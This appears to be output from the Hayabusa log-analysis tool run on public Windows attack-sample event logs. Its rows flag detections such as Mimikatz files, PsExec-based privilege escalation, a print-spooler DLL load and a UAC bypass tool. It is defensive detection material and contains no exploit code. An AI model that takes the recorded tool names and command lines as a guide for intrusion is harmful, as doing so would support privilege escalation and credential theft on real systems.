https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-23 23:09:10.403 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bhxvH.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-24 00:34:38.147 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bhAo3.img?w=100&h=100&m=6&tilesize=medium&x=1228&y=258&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-24 00:41:52.668 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bhEQI.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-24 21:47:56.181 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-24 21:47:57.912 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml 
| URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-25 06:06:52.429 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aV2sK.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-25 08:55:56.229 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bkiYw.img?w=100&h=100&m=6&tilesize=medium&x=1094&y=441&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-25 18:56:29.274 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://storage.googleapis.com/update-delta/gkmgaooipdjhmangpemjhigmamcehddo/86.249.200/84.243.200/17f6e5d11e18da93834a470f7266ede269d3660ac7a4c31c0d0acdb0c4c34ba2.crxd,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-25 18:57:51.221 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/AN67dIUbQty67HoEacsJ61c_6260/APHk7sg8XbALFcVmjTty4CQ,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-25 
18:57:59.420 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/Jo7Lnj2MkXB5ezNave49dw_2509/AOHc3HV2drrDzlxLOXeJFhs,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-25 23:04:33.703 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-25 23:04:36.013 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-26 19:44:49.642 +09:00,02694w-win10.threebeesco.com,1,info,,Process Created,"Cmd: pocacct.exe payload.dll | Process: C:\Users\lgreen\Downloads\PrivEsc\pocacct.exe | User: 3B\lgreen | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x2dfbe | PID: 6320 | PGUID: 6A3C3EF2-8721-5FBF-0000-001009894600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_sysmon_cve_20201030_spooler.evtx 2020-11-26 19:44:49.642 +09:00,02694w-win10.threebeesco.com,1,medium,Exec,Suspicious File Characteristics Due to Missing Fields,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_sysmon_cve_20201030_spooler.evtx 2020-11-26 19:45:14.007 +09:00,02694w-win10.threebeesco.com,1,info,,Process Created,Cmd: C:\WINDOWS\System32\spoolsv.exe | 
Process: C:\Windows\System32\spoolsv.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\WINDOWS\system32\services.exe | LID: 0x3e7 | PID: 8716 | PGUID: 6A3C3EF2-8739-5FBF-0000-001075514700,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_sysmon_cve_20201030_spooler.evtx 2020-11-26 19:45:24.216 +09:00,02694w-win10.threebeesco.com,7,info,Persis | Evas | PrivEsc,Windows Spooler Service Suspicious Binary Load,,../hayabusa-rules/sigma/image_load/sysmon_spoolsv_dll_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_sysmon_cve_20201030_spooler.evtx 2020-11-26 22:23:30.614 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-26 22:23:32.141 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-27 02:38:11.138 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: byeintegrity5-uac.exe | Process: C:\Users\Public\tools\privesc\uac\byeintegrity5-uac.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x6ca44 | PID: 11644 | PGUID: 00247C92-E803-5FBF-0000-0010D1B5B40C",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx 2020-11-27 02:38:11.138 +09:00,LAPTOP-JU4M3I0E,1,high,Evas,Execution from Suspicious 
Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx 2020-11-27 02:38:11.147 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\Public\tools\privesc\uac\system32\npmproxy.dll | Process: C:\Users\Public\tools\privesc\uac\byeintegrity5-uac.exe | PID: 11644 | PGUID: 00247C92-E803-5FBF-0000-0010D1B5B40C,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx 2020-11-27 02:38:11.147 +09:00,LAPTOP-JU4M3I0E,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx 2020-11-27 02:38:11.154 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,Cmd: taskhostw.exe $(Arg0) | Process: C:\Windows\System32\taskhostw.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: C:\windows\system32\svchost.exe -k netsvcs -p -s Schedule | LID: 0x6c9e0 | PID: 17336 | PGUID: 00247C92-E803-5FBF-0000-0010CDB9B40C,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx 2020-11-27 02:38:11.175 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: taskhostw.exe $(Arg0) | LID: 0x6c9e0 | PID: 16980 | PGUID: 00247C92-E803-5FBF-0000-0010F2BFB40C",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx 2020-11-28 05:15:22.956 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job 
Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-28 05:15:23.662 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-29 01:17:33.019 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-29 01:17:34.712 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-29 21:31:21.179 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-29 21:31:22.012 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-30 01:29:22.597 
+09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bsJv4.img?w=100&h=100&m=6&tilesize=medium&x=3175&y=1599&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-30 22:15:33.442 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Font Download | URL: https://fs.microsoft.com/fs/windows/config.json,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-12-05 07:41:04.470 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k localService -p -s RemoteRegistry | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: ? | LID: 0x3e5 | PID: 8536 | PGUID: 747F3D96-BB00-5FCA-0000-001033CD7600,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx 2020-12-05 07:41:04.470 +09:00,MSEDGEWIN10,1,low,Evas,Windows Processes Suspicious Parent Directory,,../hayabusa-rules/sigma/process_creation/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx 2020-12-05 07:41:04.470 +09:00,MSEDGEWIN10,1,high,Evas,Suspicious Svchost Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx 2020-12-05 07:41:04.545 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion Autorun Keys 
Modification,,../hayabusa-rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx 2020-12-05 07:41:05.471 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.17:49792 (MSEDGEWIN10CLON) | Dst: 10.0.2.15:445 (MSEDGEWIN10) | User: | Process: | PID: 4 | PGUID: 747F3D96-33FC-5FCB-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx 2020-12-10 01:52:34.562 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Users\Public\psexecprivesc.exe"" C:\Windows\System32\mspaint.exe | Process: C:\Users\Public\psexecprivesc.exe | User: MSEDGEWIN10\user02 | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" | LID: 0x7485cb | PID: 13004 | PGUID: 747F3D96-00D2-5FD1-0000-0010FA4C5301",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx 2020-12-10 01:52:34.562 +09:00,MSEDGEWIN10,1,high,Evas,Execution from Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx 2020-12-10 01:52:34.622 +09:00,MSEDGEWIN10,17,info,,Pipe Created,\PSEXESVC | Process: C:\Users\Public\psexecprivesc.exe | PID: 13004 | PGUID: 747F3D96-00D2-5FD1-0000-0010FA4C5301,../hayabusa-rules/hayabusa/sysmon/events/17_PipeCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx 2020-12-10 01:52:34.622 +09:00,MSEDGEWIN10,17,low,Exec,PsExec Tool Execution,,../hayabusa-rules/sigma/pipe_created/pipe_created_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx 2020-12-10 01:52:41.861 
+09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\PSEXESVC.exe | Process: C:\Windows\PSEXESVC.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ? | LID: 0x3e7 | PID: 16344 | PGUID: 747F3D96-00D9-5FD1-0000-001021855301,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx 2020-12-10 01:52:41.861 +09:00,MSEDGEWIN10,1,low,Exec,PsExec Service Start,,../hayabusa-rules/sigma/process_creation/proc_creation_win_psexesvc_start.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx 2020-12-10 01:52:41.861 +09:00,MSEDGEWIN10,1,low,Exec,PsExec Tool Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx 2020-12-10 01:52:42.478 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\PSEXESVC | Process: System | PID: 4 | PGUID: 747F3D96-76F2-5FD1-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx 2020-12-10 01:52:42.478 +09:00,MSEDGEWIN10,18,low,Exec,PsExec Tool Execution,,../hayabusa-rules/sigma/pipe_created/pipe_created_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx 2020-12-10 01:52:42.933 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.17:50335 () | Dst: 10.0.2.15:445 (MSEDGEWIN10) | User: | Process: | PID: 4 | PGUID: 747F3D96-76F2-5FD1-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx 2020-12-10 01:52:42.934 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.17:50336 () | Dst: 10.0.2.15:135 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: 
C:\Windows\system32\svchost.exe | PID: 876 | PGUID: 747F3D96-76FB-5FD1-0000-0010E6C40000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx 2020-12-10 01:52:44.864 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\PSEXESVC | Process: C:\Users\Public\psexecprivesc.exe | PID: 13004 | PGUID: 747F3D96-00D2-5FD1-0000-0010FA4C5301,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx 2020-12-10 01:52:44.864 +09:00,MSEDGEWIN10,18,low,Exec,PsExec Tool Execution,,../hayabusa-rules/sigma/pipe_created/pipe_created_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx 2020-12-10 01:52:45.141 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\mspaint.exe"" 췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍 | Process: C:\Windows\System32\mspaint.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\PSEXESVC.exe | LID: 0x3e7 | PID: 7988 | PGUID: 747F3D96-00DD-5FD1-0000-0010F7D25301",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx 2020-12-10 07:45:33.090 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\onedrive.exe | Process: System | PID: 4 | PGUID: 747F3D96-CDE2-5FD1-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lateral_movement_startup_3_11.evtx 2020-12-10 07:45:34.204 +09:00,MSEDGEWIN10,3,info,,Network 
Connection,tcp | Src: 10.0.2.17:49791 (MSEDGEWIN10CLON) | Dst: 10.0.2.15:445 (MSEDGEWIN10) | User: | Process: | PID: 4 | PGUID: 747F3D96-CDE2-5FD1-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lateral_movement_startup_3_11.evtx
2020-12-10 20:18:52.190 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.17:49851 (MSEDGEWIN10CLON) | Dst: 10.0.2.15:135 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\system32\svchost.exe | PID: 896 | PGUID: 747F3D96-7E78-5FD2-0000-0010E1C40000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/wmi_remote_registry_sysmon.evtx
2020-12-10 20:18:52.191 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.17:49852 (MSEDGEWIN10CLON) | Dst: 10.0.2.15:135 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\system32\svchost.exe | PID: 896 | PGUID: 747F3D96-7E78-5FD2-0000-0010E1C40000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/wmi_remote_registry_sysmon.evtx
2020-12-10 20:18:52.447 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.17:49853 (MSEDGEWIN10CLON) | Dst: 10.0.2.15:49847 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: C:\Windows\System32\svchost.exe | PID: 2784 | PGUID: 747F3D96-FFEE-5FD1-0000-00101DDF0100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/wmi_remote_registry_sysmon.evtx
2020-12-10 20:18:54.600 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | Process: C:\Windows\System32\wbem\WmiPrvSE.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: ? | LID: 0x3e5 | PID: 5580 | PGUID: 747F3D96-041E-5FD2-0000-001024DF3B00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/wmi_remote_registry_sysmon.evtx
2020-12-10 20:18:54.856 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion Autorun Keys Modification,,../hayabusa-rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/wmi_remote_registry_sysmon.evtx
2020-12-11 21:28:01.299 +09:00,WIN10-client01.offsec.lan,1116,high,,Windows Defender Alert,Threat: HackTool:Win64/Mikatz!dha | Severity: High | Type: Tool | User: OFFSEC\admmig | Path: file:_C:\Users\admmig\Documents\mimidrv.sys | Process: C:\Windows\explorer.exe,../hayabusa-rules/hayabusa/default/alerts/WindowsDefender/1116_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
2020-12-11 21:28:01.299 +09:00,WIN10-client01.offsec.lan,1116,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
2020-12-11 21:28:01.299 +09:00,WIN10-client01.offsec.lan,1116,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
2020-12-11 21:28:01.566 +09:00,WIN10-client01.offsec.lan,1116,high,,Windows Defender Alert,Threat: HackTool:Win32/Mimikatz.D | Severity: High | Type: Tool | User: OFFSEC\admmig | Path: file:_C:\Users\admmig\Documents\mimikatz.exe | Process: C:\Windows\explorer.exe,../hayabusa-rules/hayabusa/default/alerts/WindowsDefender/1116_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
2020-12-11 21:28:01.566 +09:00,WIN10-client01.offsec.lan,1116,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
2020-12-11 21:28:01.651 +09:00,WIN10-client01.offsec.lan,1116,high,,Windows Defender Alert,Threat: HackTool:Win64/Mikatz!dha | Severity: High | Type: Tool | User: OFFSEC\admmig | Path: file:_C:\Users\admmig\Documents\mimidrv.sys; file:_C:\Users\admmig\Documents\mimilib.dll | Process: C:\Windows\explorer.exe,../hayabusa-rules/hayabusa/default/alerts/WindowsDefender/1116_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
2020-12-11 21:28:01.651 +09:00,WIN10-client01.offsec.lan,1116,high,Exec,Possible CVE-2021-1675 Print Spooler Exploitation,,../hayabusa-rules/sigma/builtin/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
